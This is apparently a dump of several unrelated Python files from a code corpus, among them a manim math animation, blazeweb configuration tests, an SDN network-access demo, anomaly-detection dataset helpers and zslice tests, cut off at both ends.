gou = TexMobject('\\checkmark', color=GREEN).set_height(1.8).next_to(equ, RIGHT * 1.75)
self.play(FadeIn(t_01.shift(UP)), FadeIn(t_02.shift(DOWN * 0.5)), run_time=1.6)
self.wait(0.4)
self.play(Write(equ[5]))
self.wait(0.4)
self.play(ReplacementTransform(t_02, equ[0:5]), run_time=1.6)
self.wait(0.5)
self.play(ReplacementTransform(t_01, equ[6:]), run_time=1.6)
self.wait(0.25)
self.play(ShowCreationThenFadeAround(SurroundingRectangle(equ).scale(1.05)), run_time=1.5)
self.wait(0.2)
self.play(Write(gou), run_time=1.5)
self.wait(3)
from others.some_anim_effect import *
class Sum_of_cubes_Intro(Scene):
def construct(self):
font = '华光粗圆_CNKI'
color_dict = {'^3': PINK, '^2': BLUE, '+': ORANGE}
replace_dict = {'1': '1', '2': '2', '3': '3', '=': '=', '^3': '3', '^2': '2', '9': '9', '36': '36', 'n': 'n', '\\cdots': '...'}
line_01 = MyText('1', '^3', '=', '1', '=', '1', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_02 = MyText('1', '^3', '+', '2', '^3', '=', '9', '=', '(', '1', '+', '2', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_03 = MyText('1', '^3', '+', '2', '^3', '+', '3', '^3', '=', '36', '=', '(', '1', '+', '2', '+', '3', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_n = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', '=', '(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
dots = Text('...', font=font).rotate(PI/2).to_edge(UP * 10.2)
        text = Text('经过观察不难发现如下规律:', font='庞门正道标题体').set_height(0.42).to_corner(UP * 1. + LEFT * 1.5)  # "By observation it is not hard to spot the following pattern:"
text_01 = line_01.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 2.5)
text_02 = line_02.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 5)
text_03 = line_03.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 7.5)
text_n = line_n.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 12.5)
text_02.shift(RIGHT * (text_01[2].get_center()[0] - text_02[5].get_center()[0]))
text_03.shift(RIGHT * (text_01[2].get_center()[0] - text_03[8].get_center()[0]))
text_03[6].set_color(WHITE), text_03[-3].set_color(WHITE)
self.play(FadeInRandom(text), run_time=1.6)
self.wait(0.4)
self.play(Write(text_01[0:4]), run_time=0.9)
self.play(Write(text_02[0:7]), run_time=1.2)
self.play(Write(text_03[0:10]), run_time=1.5)
self.wait(0.5)
self.play(Write(text_01[4:]), Write(text_02[7:]), Write(text_03[10:]), run_time=1.8)
self.wait(1.5)
self.play(Write(dots), run_time=1.4)
self.wait(0.6)
self.play(WriteRandom(text_n), run_time=2.5)
self.wait(1.8)
self.play(FadeOutAndShift(VGroup(text, text_01, text_02, text_03, dots), UP), text_n.move_to, UP, run_time=1.8)
        text_how = Text('如何证明该结论呢?', font='庞门正道标题体').set_height(0.75).next_to(text_n, DOWN * 1.6)  # "How can we prove this result?"
        text_7method = Text('我们将介绍七种可视化证明方法', font='庞门正道标题体').set_height(0.65).next_to(text_n, DOWN * 1.64)  # "We will present seven visual proof methods"
        text_7method.set_color_by_t2c({'七种': BLUE, '可视化证明': PINK})  # highlight "seven" / "visual proof"
self.wait(0.6)
self.play(Write(text_how), run_time=2.2)
self.wait(1.5)
self.play(ReplacementTransform(text_how, text_7method), run_time=1.8)
self.wait(3.)
self.play(UnWriteRandom(text_7method), UnWriteRandom(text_n), run_time=1.2)
self.wait(0.25)
|
nilq/baby-python
|
python
|
# import unittest
# from unittest.mock import patch
# import http.client
|
nilq/baby-python
|
python
|
from app import app
import dataquery
import json
@app.route("/ajaxreq/get_capital_account_info<any:args>", methods=['GET'])
def ajaxrep_get_capital_account_info(args):
    #cai = dataquery.get_capital_account_info()
    return "abc"
    #return json.dumps(cai)
|
nilq/baby-python
|
python
|
import socket
import sys
import hlt
PORT_ = 2000
class Game(hlt.Game):
def __init__(self, *args, **kwargs):
self._buf = []
self._connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._connection.connect(("localhost", PORT_))
super().__init__(*args, **kwargs)
def _send_string(self, s):
"""
        Send data to the game. Call :func:`_done_sending` once finished.
:param str s: String to send
:return: nothing
"""
self._buf.append(s)
def _done_sending(self):
"""
Finish sending commands to the game.
:return: nothing
"""
self._connection.sendall((''.join(self._buf) + "\n").encode("ascii"))
self._buf.clear()
    def _get_string(self):
        """
        Read input from the game.
        :return: The input read from the Halite engine
        :rtype: str
        """
        buf = []
        while True:
            # Read one byte at a time so a newline embedded in a larger chunk
            # is not appended to the buffer along with the rest of the line.
            c = self._connection.recv(1).decode("ascii")
            if c == "\n" or not c:
                break
            buf.append(c)
        # An empty read means the engine closed the connection.
        if not c:
            sys.exit()
        return "".join(buf)
def send_command_queue(self, command_queue):
"""
Issue the given list of commands.
:param list[str] command_queue: List of commands to send the Halite engine
:return: nothing
"""
for command in command_queue:
self._send_string(command)
self._done_sending()
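# Usage sketch (hypothetical bot loop; assumes the hlt.Game base class exposes
# update_map(), as in the Halite II starter kit):
#   game = Game("SocketBot")
#   while True:
#       game_map = game.update_map()
#       game.send_command_queue([])  # an empty turn; real bots queue ship commands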
|
nilq/baby-python
|
python
|
from typing import Iterable, List
import sparql_queries
from movie import Movie
from joblib import Parallel, delayed
from env import env
class Recommandation():
    def __init__(self, uri, func, id, text) -> None:
        # Resolve the SPARQL query function by name and run it for this URI,
        # then wrap every returned row in a Movie instance.
        self.data = getattr(sparql_queries, func)(uri)
        self.data = [Movie(dataReco=mov) for mov in self.data]
        self.id = id
        self.text = text
class Recommandations():
def __init__(self, movie) -> None:
self.recommandations = Parallel(n_jobs=-1)(delayed(Recommandation)(movie.uri, func, func, text)
for func, text in zip(env.recommandation_functions, env.recommendation_categories))
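# Usage sketch (hypothetical; assumes a Movie instance whose .uri is populated):
#   recos = Recommandations(movie)
#   for reco in recos.recommandations:
#       print(reco.id, reco.text, len(reco.data))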
|
nilq/baby-python
|
python
|
import unittest
from blazeweb.globals import settings
from blazeweb.config import QuickSettings, EnabledSettings
from blazeweb.hierarchy import listapps
from nose.tools import eq_
from minimal2.application import make_wsgi as make_wsgi_min2
from blazewebtestapp.applications import make_wsgi
class Base(QuickSettings):
def __init__(self):
QuickSettings.__init__(self)
# name of the website/application
self.name.full = 'full'
self.name.short = 'short'
# application modules from our application or supporting applications
self.modules = EnabledSettings()
self.modules.users.enabled = True
self.modules.users.var2 = 'not bar'
self.modules.users.routes = []
self.modules.users.level2.var2 = 'not bar'
self.modules.users.level3 = 'string value to merge'
self.modules.users.level4 = (('var2', 'not bar'), ('var3', 'baz'))
self.modules.users.level5.level1.var1.notlikely = 'foo'
self.modules.users.level5.level2.var1 = 'not_bar'
self.modules.apputil.enabled = True
self.modules.inactivemod.enabled = False
#######################################################################
# ROUTING
#######################################################################
# default routes
self.routing.routes = [1, 2]
# route prefix
self.routing.prefix = ''
#######################################################################
# DATABASE
#######################################################################
self.db.echo = False
#######################################################################
# SESSIONS
#######################################################################
# beaker session options
# http://wiki.pylonshq.com/display/beaker/Configuration+Options
self.beaker.type = 'dbm'
self.beaker.data_dir = 'session_cache'
#######################################################################
# TEMPLATE & VIEW
#######################################################################
self.template.default = 'default.html'
self.template.admin = 'admin.html'
self.trap_view_exceptions = True
#######################################################################
# LOGGING & DEBUG
#######################################################################
# currently support 'debug' & 'info'
self.logging.levels = ()
# no more values can be added
self.lock()
class Default(Base):
def __init__(self):
Base.__init__(self)
# supporting applications
self.supporting_apps = ['rcsappbase']
# application modules from our application or supporting applications
self.unlock()
self.modules.contentbase.enabled = True
self.modules.lagcontent.enabled = True
self.lock()
#######################################################################
# ROUTING
#######################################################################
self.routing.routes.extend([3, 4])
#######################################################################
# DATABASE
#######################################################################
self.db.echo = True
#######################################################################
# LOGGING & DEBUG
#######################################################################
self.logging.levels = ('info', 'debug')
self.trap_view_exceptions = False
self.hide_exceptions = False
class UserSettings(QuickSettings):
def __init__(self):
QuickSettings.__init__(self)
self.routes = ([
'/test1',
'/test2',
])
self.var1 = 'foo'
self.var2 = 'bar'
self.level2.var1 = 'foo'
self.level2.var2 = 'bar'
self.level3.var1 = 'foo'
self.level3.var2 = 'bar'
self.level4.var1 = 'foo'
self.level4.var2 = 'bar'
self.level5.level1.var1 = 'foo'
self.level5.level2.var1 = 'bar'
self.level5.level2.var2 = 'baz'
self.level5.level3.var1 = 'bob'
# no more values can be added
self.lock()
class TestQuickSettings(unittest.TestCase):
def test_level1(self):
es = QuickSettings()
es.a = 1
assert es.a == 1
def test_level2(self):
es = QuickSettings()
es.a.a = 1
assert es.a.a == 1
def test_email(self):
es = QuickSettings()
es.email.smtp.server = 'example.com'
es.email.smtp.user_name = 'myself'
es.email.smtp.password = 'pass'
assert es.email.smtp.server == 'example.com'
assert es.email.smtp.user_name == 'myself'
assert es.email.smtp.password == 'pass'
def test_settings(self):
s = Default()
assert s.name.full == 'full'
assert s.name.short == 'short'
assert s.modules.keys() == ['users', 'apputil', 'contentbase', 'lagcontent']
assert s.routing.routes == [1, 2, 3, 4]
assert s.db.echo is True
assert s.logging.levels == ('info', 'debug')
assert s.trap_view_exceptions is False
assert s.hide_exceptions is False
assert s.template.default == 'default.html'
assert s.template.admin == 'admin.html'
assert s.beaker.type == 'dbm'
assert s.beaker.data_dir == 'session_cache'
def test_lock(self):
s = Default()
try:
s.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work, expected AttributeError")
# make sure lock went to children
try:
s.db.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work on child, expected AttributeError")
def test_unlock(self):
s = Default()
s.unlock()
s.new_attr = 'new_attr'
s.db.new_attr = 'new_attr'
assert s.db.new_attr == 'new_attr'
assert s.new_attr == 'new_attr'
s.lock()
try:
s.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work, expected AttributeError")
# make sure lock went to children
try:
s.db.not_there
except AttributeError as e:
assert str(e) == "object has no attribute 'not_there' (object is locked)"
else:
self.fail("lock did not work on child, expected AttributeError")
def test_dict_convert(self):
s = Default()
# beaker would need a dictionary, so lets see if it works
d = {
'type': 'dbm',
'data_dir': 'session_cache'
}
assert dict(s.beaker) == d
assert s.beaker.todict() == d
    def test_hasattr(self):
        s = Default()
        assert hasattr(s, 'alajsdf') is False
        # repeated on purpose: the failed lookup above must not create the attribute
        assert hasattr(s, 'alajsdf') is False
        s.unlock()
        # an unlocked QuickSettings auto-creates attributes on access, so hasattr is True
        assert hasattr(s, 'alajsdf') is True
def test_modules(self):
s = Default()
s.unlock()
try:
s.modules.badmod = False
except TypeError:
pass
else:
self.fail('expected TypeError when non QuickSettings object assigned to '
'EnabledSettings object')
s.modules.fatfingeredmod.enabledd = True
s.lock()
mods = ['users', 'apputil', 'contentbase', 'lagcontent']
allmods = ['users', 'apputil', 'inactivemod', 'contentbase', 'lagcontent',
'fatfingeredmod']
self.assertEqual(mods, s.modules.keys())
self.assertEqual(allmods, s.modules.keys(showinactive=True))
self.assertEqual(len(mods), len([v for v in s.modules]))
self.assertEqual(len(mods), len(s.modules))
self.assertEqual(len(mods), len(s.modules.values()))
self.assertEqual(len(allmods), len(s.modules.values(showinactive=True)))
self.assertEqual(len(mods), len(s.modules.todict()))
self.assertEqual(len(allmods), len(s.modules.todict(showinactive=True)))
self.assertTrue('users' in s.modules)
self.assertFalse('inactivemod' in s.modules)
def test_merge(self):
s = Default()
us = UserSettings()
try:
self.assertEqual(s.modules.users.var1, 'foo')
except AttributeError as e:
assert str(e) == "object has no attribute 'var1' (object is locked)"
else:
self.fail("expected AttributeError for 'var1'")
self.assertEqual(s.modules.users.var2, 'not bar')
self.assertEqual(us.var2, 'bar')
self.assertEqual(len(us.routes), 2)
self.assertEqual(us.level2.var1, 'foo')
self.assertEqual(us.level2.var2, 'bar')
self.assertEqual(us.level3.var2, 'bar')
self.assertEqual(us.level4.var2, 'bar')
self.assertEqual(us.level5.level1.var1, 'foo')
self.assertEqual(us.level5.level2.var1, 'bar')
self.assertEqual(us.level5.level2.var2, 'baz')
self.assertEqual(us.level5.level3.var1, 'bob')
us.update(s.modules.users)
s.modules['users'] = us
self.assertEqual(s.modules.users.var2, 'not bar')
self.assertEqual(s.modules.users.var1, 'foo')
self.assertEqual(len(s.modules.users.routes), 0)
self.assertEqual(s.modules.users.level2.var1, 'foo')
self.assertEqual(s.modules.users.level2.var2, 'not bar')
self.assertEqual(s.modules.users.level3, 'string value to merge')
self.assertEqual(s.modules.users.level4.var1, 'foo')
self.assertEqual(s.modules.users.level4.var2, 'not bar')
self.assertEqual(s.modules.users.level4.var3, 'baz')
self.assertEqual(s.modules.users.level5.level1.var1.notlikely, 'foo')
self.assertEqual(s.modules.users.level5.level2.var1, 'not_bar')
self.assertEqual(s.modules.users.level5.level2.var2, 'baz')
self.assertEqual(s.modules.users.enabled, True)
class TestConfig(unittest.TestCase):
def setUp(self):
self.app = make_wsgi('Testruns')
def test_appslist(self):
self.assertEqual(['blazewebtestapp', 'blazewebtestapp2'], listapps())
self.assertEqual(['blazewebtestapp2', 'blazewebtestapp'], listapps(reverse=True))
def test_settings(self):
self.assertEqual(settings.foo, 'bar')
def test_modsettings(self):
self.assertEqual(settings.components.tests.foo, 'baz')
def test_settingslock(self):
""" tests the lock() in appinit() """
try:
settings.notthere
except AttributeError as e:
assert str(e) == "object has no attribute 'notthere' (object is locked)"
else:
self.fail("expected AttributeError for 'notthere'")
def test_modulesettingslock(self):
""" tests the lock() in appinit() for module settings """
try:
settings.components.tests.notthere
except AttributeError as e:
assert str(e) == "object has no attribute 'notthere' (object is locked)"
else:
self.fail("expected AttributeError for 'notthere'")
class TestDefaultSettings(object):
@classmethod
def setup_class(cls):
make_wsgi_min2('TestStorageDir')
def test_storage_dir(self):
# assume we are in a virtualenv
assert settings.dirs.storage.endswith('storage-minimal2')
class TestComponentSettings(object):
@classmethod
def setup_class(cls):
make_wsgi_min2('Dispatching')
def test_components(self):
pm = settings.componentmap.minimal2
assert pm.internalonly.enabled is True
assert pm.internalonly.packages == [None]
assert pm.news.enabled is True
assert pm.news.packages == [None, 'newscomp4']
assert pm.foo.enabled is True
assert pm.foo.packages == ['foobwp']
assert settings.component_packages.newscomp4 == 'news'
assert settings.component_packages.foobwp == 'foo'
eq_(settings.component_packages.todict().keys(), ['newscomp4', 'foobwp'])
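# Quick illustration of the merge semantics exercised in test_merge above
# (hypothetical values):
#   base = QuickSettings(); base.var = 'default'
#   override = QuickSettings(); override.var = 'custom'
#   base.update(override)  # base.var is now 'custom'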
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
DESCRIPTION:
This is an extremely simple Python application that demonstrates how to use Elbrys SDN Developer Lab (dev.elbrys.com) to
control network access for endpoint user sessions.
This application will connect to one of the switches that you have connected in the SDN Developer Lab (sdn-developer.elbrys.com)
and demonstrate blocking and unblocking of network traffic for any device connected to the switch.
PRE-REQUISITES:
1. Python 2.x
2. Install python-requests:
a. sudo easy_install requests
3. Go to dev.elbrys.com and follow the directions there
Mail bug reports and suggestion to : support@elbrys.com
"""
import sys, os, errno
import requests
import json
import time
import argparse
from requests.auth import HTTPBasicAuth
def GetAuthToken(user, password, parser):
global odlsBaseUrl
# This calls the api to create an authorization token to make other calls
# RETURNS: authorization token
url = odlsBaseUrl + '/auth/token'
headers = {'content-type': 'application/json'}
user = "name="+user
appId = requests.get(url, headers=headers, auth=HTTPBasicAuth(user,password))
result = appId.text
status = appId.status_code
if ((status >= 200) & (status <=299)):
authToken = appId.json()
authToken = authToken['token']
else:
print " "
print "!! Error !!"
        print " Unable to create authorization token. Double check the username and password you entered."
print " See usage below:"
parser.print_help()
sys.exit()
return authToken;
def GetApps(authToken):
global odlsBaseUrl
url = odlsBaseUrl + '/applications'
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.get(url, headers=headers)
if ((r.status_code < 200) | (r.status_code > 299)):
print "Error getting applications list: " + r.text
sys.exit()
else:
return r
def GetAppInfo(authToken, appId):
global odlsBaseUrl
url = odlsBaseUrl + '/applications/' + appId
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.get(url, headers=headers)
if ((r.status_code < 200) | (r.status_code > 299)):
print "Error getting application info: " + r.text
sys.exit()
else:
return r
def RemoveZombieApps(authToken, switch):
# Removes any old applications currently connected to the target switch. Only
# one application may be connected to a switch.
apps = GetApps(authToken)
for a in apps.json():
appInfo = GetAppInfo(authToken, a['id'])
appInfo = appInfo.json()
appScope = appInfo['scope']
appVnets = appScope['vnets']
for v in appVnets:
if (v == switch):
print "Deleting a zombie application: " + a['id'] + ", " + a['name']
DeleteApp(authToken,a['id'])
break
def CreateApp(authToken, switch, parser):
global odlsBaseUrl
# This calls the api to create an application
# RETURNS: app identifier
RemoveZombieApps(authToken, switch)
url = odlsBaseUrl + '/applications'
payload = {'name': 'FirstSdnApp/App1 - Example OpenNAC App for switch: ' + switch,
'scope': {'vnets':[switch]}}
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
appId = requests.post(url, data=json.dumps(payload), headers=headers)
result = appId.text
status = appId.status_code
if ((status >= 200) & (status <=299)):
appId = appId.json()
appId = appId['id']
else:
print " "
print "!! Error !!"
print " Unable to create application. Double check your switch identifier."
print " See usage below:"
parser.print_help()
sys.exit()
return appId;
def CreateUnblockPolicy(authToken, appId):
global odlsBaseUrl
# This calls the api to create an authenticated
# policy for the application.
# This is the policy that a new endpoint will
# be given.
# This policy will:
# - allow any packet to pass
    # RETURNS: policy identifier
# Now create authenticated policy using network resource
url = odlsBaseUrl + '/applications/' + appId + '/policies'
payload = {
'name': 'unblocked',
'default': True,
'rules': [
{
'actions': [
{'type': 'pass'}
]
}
]
}
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.post(url, data=json.dumps(payload), headers=headers)
# print "here 5" + r.status_code
status = r.status_code
if ((status >= 200) & (status <=299)):
policyId = r.json()
policyId = policyId['id']
else:
print " "
print "!! Error !!"
print " Unable to create unblock policy."
sys.exit()
return policyId;
def DeleteApp(authToken, appId):
global odlsBaseUrl
# This calls the api to delete an application
    # RETURNS: nothing
url = odlsBaseUrl + '/applications/' + appId
headers = {'content-type': 'application/json',
'Authorization': 'bearer ' + authToken}
r = requests.delete(url, headers=headers)
def GetCommandLineParser():
# This method will process the command line parameters
parser = argparse.ArgumentParser(description='Simple SDN Application to block/unblock devices connected to switch.')
parser.add_argument('--id',required=True,
help='your Application id. Go to sdn-developer.elbrys.com, logon, SDN Applications table for SDN App ID.')
parser.add_argument('--secret',required=True,
help='your Application secret. Go to sdn-developer.elbrys.com, logon, look at SDN Applications table for SDN App Secret and select the "eyeball" icon.')
parser.add_argument('--switch',required=True,
help='the Datapath Id (DPID) for the switch connected without ":" e.g. ccfa00b07b95 Go to sdn-developer.elbrys.com, logon, look in "Devices" table')
parser.add_argument('--server',required=True,
help='The IP address of controller. Go to sdn-developer.elbrys.com, logon, look at "Controller" table for IP Address.')
parser.add_argument('--port',required=True,
help='The TCP port number for REST API . Go to sdn-developer.elbrys.com, logon, look at "Controller" table for REST API Port.')
return parser
def main():
global odlsBaseUrl
# The version of the application
# 1.0 - initial version
# 1.1 - added code to remove apps for selected vnet before creating new app
version="1.1"
print "App1 (FirstSdnApp)"
print "Version: " + version
print "A very simple 'hello world' application that uses SDN Developer Lab."
print __doc__
# --------------------------------
# Command Line Processing
parser=GetCommandLineParser()
args = parser.parse_args()
odlsBaseUrl = "http://"+args.server+":"+args.port+"/ape/v1"
print "REST API is at: " + odlsBaseUrl
# --------------------------------
# Main application
print " "
print "Obtaining authorization token..."
authToken = GetAuthToken(args.id,args.secret,parser)
if (authToken):
print "...authorization token obtained:" + authToken
print " "
print 'Creating application...'
        appId = CreateApp(authToken, args.switch, parser)
        if appId:
try:
print "...application created with id:" + appId
print " "
print "Now that an application is connected to your "
print " switch any traffic to/from connected user devices will be blocked until a policy is defined."
print " Also, you can go to sdn-developer.elbrys.com and refresh the screen "
print " you will see this application listed in the applications table."
print " "
print "Connect a user device (laptop, tablet, phone) to a port on your network device."
print " "
raw_input("Press Enter when you have connected a user device.")
print " "
print "From your user device prove to yourself you do NOT have connectivity. Ping something."
print " "
raw_input("Press Enter when you have proven your user device is blocked.")
print " "
print "Creating unblock policy as default for any device detected..."
unblockPolicyId = CreateUnblockPolicy(authToken, appId)
print "...unblock policy created with id:" + unblockPolicyId
print " "
print "From your user device prove to yourself you now DO have connectivity. Try to ping something."
print " "
raw_input("Press Enter to end this application.")
except Exception as inst:
print " Exception detected..."
print type(inst) # the exception instance
print inst.args # arguments stored in .args
print inst # __str__ allows args to be printed directly
finally:
print "Deleting application..."
DeleteApp(authToken, appId)
print "...application deleted."
print ""
print "Now that the application is deleted you will continue to have connectivity."
print "If you go to your sdn-developer.elbrys.com and refresh the screen you will "
print " no longer see this application listed."
# The BASE url where the RESTful api listens
odlsBaseUrl = "http://placeholder.for.rest.api.com";
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
"""Unit tests for flux calibration/zeropoints
Authors
-------
- Bryan Hilbert
Use
---
Ensure you have pytest installed. Then, simply run pytest in any
parent directory of mirage/tests/:
>>> pytest
"""
from astropy.table import Table
import numpy as np
import os
import pkg_resources
from mirage.utils import flux_cal
package_path = pkg_resources.resource_filename('mirage', '')
CONFIG_DIR = os.path.join(package_path, 'config')
def test_add_detector_to_zeropoints():
"""Test addition of column to table
"""
detector = 'NRCA1'
tab = Table()
tab['index'] = np.arange(5)
tab['information'] = [1.2, 2.3, 3.4, 4.5, 5.6]
updated_tab = flux_cal.add_detector_to_zeropoints(detector, tab)
assert np.all(updated_tab['Detector'].data == np.array([detector] * 5))
assert np.all(updated_tab['index'].data == tab['index'].data)
assert np.all(updated_tab['information'].data == tab['information'].data)
def test_fluxcal_info():
"""Test that zeropoint information for the exposure is correctly retrieved
"""
params = {'Inst': {"instrument": 'NIRCAM'},
'Readout': {'filter': 'F200W', 'pupil': 'CLEAR'},
'Reffiles': {'flux_cal': os.path.join(CONFIG_DIR, 'NIRCam_zeropoints.list')}
}
detector = 'NRCA1'
module = 'A'
vegazp, photflam, photfnu, pivot = flux_cal.fluxcal_info(params['Reffiles']['flux_cal'], 'NIRCAM',
params['Readout']['filter'],
params['Readout']['pupil'], detector, module)
assert vegazp == 25.53922551081712
assert photflam == 3.494575360570938e-21
assert photfnu == 4.610220127681534e-31
assert pivot == 1.9887215391807087
|
nilq/baby-python
|
python
|
def clean_string(s):
if len(s) == 0:
return s
q = []
for idx in range(len(s)):
if s[idx] != "#":
q.append(s[idx])
elif len(q) != 0:
q.pop()
return "".join(q)
|
nilq/baby-python
|
python
|
import os
high_scores = {
"small_1" : "0",
"small_2" : "0",
"small_3" : "0",
"medium_1" : "0",
"medium_2" : "0",
"medium_3" : "0",
"large_1" : "0",
"large_2" : "0",
"large_3" : "0",
}
|
nilq/baby-python
|
python
|
from typing import List
import torch
from torch.utils.data.dataset import Dataset
def noise(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
nom_class: int, train_set: Dataset, gt: bool = False) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
    :param gt: whether to provide ground-truth maps as well; not available for pure noise at the moment!
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
if gt:
raise ValueError('No GT mode for pure noise available!')
anom = generated_noise.clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
train_set.data = data
train_set.targets = targets
return train_set
def malformed_normal(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor, nom_class: int,
train_set: Dataset, gt: bool = False, brightness_threshold: float = 0.11*255) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
Unlike above, the noise images are not directly utilized as anomalies, but added to nominal samples to
create malformed normal anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well.
    :param brightness_threshold: if the average brightness (averaged over color channels) of a pixel exceeds this
        threshold, the noise image's pixel value is subtracted instead of added.
        This avoids brightening already-bright pixels, where adding more brightness has little visible effect.
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
assert (norm.dim() == 4 or norm.dim() == 3) and generated_noise.shape == norm.shape
norm_dim = norm.dim()
if norm_dim == 3:
norm, generated_noise = norm.unsqueeze(1), generated_noise.unsqueeze(1) # assuming ch dim is skipped
anom = norm.clone()
# invert noise for bright regions (bright regions are considered being on average > brightness_threshold)
generated_noise = generated_noise.int()
bright_regions = norm.sum(1) > brightness_threshold * norm.shape[1]
for ch in range(norm.shape[1]):
gnch = generated_noise[:, ch]
gnch[bright_regions] = gnch[bright_regions] * -1
generated_noise[:, ch] = gnch
anom = (anom.int() + generated_noise).clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
if norm_dim == 3:
data = data.squeeze(1)
train_set.data = data
train_set.targets = targets
if gt:
gtmaps = torch.cat(
(torch.zeros_like(norm)[:, 0].float(), # 0 for nominal
(norm != anom).max(1)[0].clone().float()) # 1 for anomalous
)
if norm_dim == 4:
gtmaps = gtmaps.unsqueeze(1)
return train_set, gtmaps
else:
return train_set
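# --- Usage sketch (illustrative only; not part of the original module) ---
# Random uint8 tensors stand in for real image data, and a bare Dataset
# subclass provides the `.data`/`.targets` attributes the functions assign to.
# All shapes and names below are assumptions chosen for demonstration.
if __name__ == '__main__':
    class _DummySet(Dataset):
        pass

    norm = torch.randint(0, 256, (8, 3, 32, 32), dtype=torch.uint8)
    gen = torch.randint(0, 64, (8, 3, 32, 32), dtype=torch.uint8)
    ds, gtmaps = malformed_normal([1], gen, norm, nom_class=0,
                                  train_set=_DummySet(), gt=True)
    # nominal and anomalous halves are concatenated along the batch dim
    print(ds.data.shape, ds.targets.shape, gtmaps.shape)
    # -> torch.Size([16, 3, 32, 32]) torch.Size([16]) torch.Size([16, 1, 32, 32])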
|
nilq/baby-python
|
python
|
import logging
import logging.handlers
import os
def create_logger(name):
"""Create generic logger for all nodes"""
# Create logger and let it capture all messages
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# Output formatting
formatter = logging.Formatter("[ %(asctime)s : %(name)s : %(levelname)s ] %(message)s")
# Create rotating file handler to backup multiple runs
filename = f"Logging/{name}"
if not os.path.exists(filename):
os.mkdir(filename)
filename = filename + "/output.log"
roll_over = os.path.isfile(filename)
file_handler = logging.handlers.RotatingFileHandler(filename, mode='a', backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
if roll_over:
file_handler.doRollover()
# Create stream handler to print to stdout
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
# Add handlers to logger
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
logger.info("--------Session start--------")
return logger
def myput(queue, obj):
    """Best-effort put: silently drop the object if the queue is full or closed"""
    try:
        queue.put_nowait(obj)
    except Exception:
        pass
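# --- Usage sketch (illustrative only) ---
# Creates ./Logging/<name>/output.log, rotating any log left by a previous run.
if __name__ == "__main__":
    log = create_logger("demo_node")
    log.debug("written to both the rotating file and stdout")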
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import pytest
from ciso import zslice
data_path = os.path.join(os.path.dirname(__file__), "data")
@pytest.fixture
def data():
p = np.linspace(-100, 0, 30)[:, None, None] * np.ones((50, 70))
x, y = np.mgrid[0:20:50j, 0:20:70j]
q = np.sin(x) + p
yield {"q": q, "p": p, "x": x, "y": y}
@pytest.fixture
def expected_results():
yield np.load(os.path.join(data_path, "fortran.npz"))["s50"]
def test_mismatch_shapes(data):
with pytest.raises(ValueError):
zslice(data["q"], data["p"][0], p0=0)
def test_p0_wrong_shape(data):
with pytest.raises(ValueError):
zslice(data["q"], data["p"], p0=np.zeros((2, 2)))
def test_bad_dtypes(data):
    # FIXME: Boolean arrays are converted to float! Only str fails correctly.
with pytest.raises(ValueError):
zslice(np.empty_like(data["q"], dtype=np.str_), data["p"], p0=0)
def test_good_dtypes(data):
# FIXME: Using `np.asfarray` will prevent from using complex dtypes.
# NOTE: There is probably a more "numpy" efficient way to test this.
dtypes = [
int,
float,
np.integer,
np.float16,
np.float32,
np.float64,
np.float128,
np.floating,
]
for dtype in dtypes:
zslice(np.empty_like(data["q"], dtype=dtype), data["p"], p0=0)
def test_3D_input(data):
K, I, J = data["q"].shape
s50 = zslice(data["q"], data["p"], p0=-50)
assert s50.shape == (I, J)
def test_2D_input(data):
K, I, J = data["q"].shape
s50 = zslice(data["q"].reshape(K, -1), data["p"].reshape(K, -1), p0=-50)
assert s50.shape == (I * J,)
def test_1D_input(data):
with pytest.raises(ValueError):
zslice(data["q"].ravel(), data["p"].ravel(), p0=0)
def test_gt_3D_input(data):
